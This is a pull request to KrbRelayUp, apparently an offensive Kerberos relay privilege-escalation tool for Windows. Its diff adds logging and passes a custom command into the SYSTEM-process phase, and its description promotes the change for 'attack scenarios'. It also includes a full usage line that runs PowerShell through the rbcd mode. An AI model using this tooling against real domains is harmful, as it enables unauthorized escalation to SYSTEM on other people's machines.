### PR TITLE
Customize krbSCM payloads with hidden window

### DIFF
--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -234,11 +234,13 @@ namespace KrbRelayUp
 
             ParseArgs(args);
 
+            Console.WriteLine($"[+] Command Line {Options.serviceCommand}");
+
             if (Options.phase == Options.PhaseType.System)
             {
                 try
                 {
-                    KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]));
+                    KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]), args[2]);
                 }
                 catch { }
                 return;
@@ -394,6 +396,9 @@ namespace KrbRelayUp
                         finalCommand = $"{finalCommand} --ServiceName \"{Options.serviceName}\"";
                     if (!String.IsNullOrEmpty(Options.serviceCommand))
                         finalCommand = $"{finalCommand} --ServiceCommand \"{Options.serviceCommand}\"";
+
+                    Console.WriteLine($"[+] final command: {finalCommand}");
+
                     Helpers.CreateProcessNetOnly(finalCommand, show: false, kirbiBytes: bFinalTicket);
                 }
                 else


### PR DESCRIPTION
Original version of KrbRelayUp could only spawn cmd.exe with a new window.
I modify the spawn process to make it more pratical in attack scenarios.

Now, it can spawn a powershell or other executable files in `bin path` like this.
`./KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <server_name> -cn <computer_name> -cp <computer_password> -sc "powershell.exe tasklist > C:\Windows\Temp\tasklist.txt"`